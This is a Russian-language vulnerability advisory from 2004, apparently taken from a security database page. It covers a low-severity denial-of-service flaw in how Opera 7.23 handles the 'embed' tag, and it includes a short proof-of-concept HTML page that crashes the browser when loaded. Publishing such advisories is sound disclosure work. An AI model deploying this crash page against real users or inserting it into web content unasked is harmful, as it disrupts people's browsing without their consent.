Удаленный отказ в обслуживании в Opera

Дата публикации:
04.09.2004
Всего просмотров:
1540
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Opera 7.23 build 3227

Описание: Уязвимость обнаружена в браузере Opera в обработке 'embed' тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя.

Пример/Эксплоит:

<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>

</head>
<body onLoad="dSend()">

<embed src="" type="CCCC" name="crash" >
</embed>
</body>
</html>

URL производителя: http://www.opera.com/

Решение:Опера 7.21 не уязвима.

Ссылки: Opera DOS

или введите имя

CAPTCHA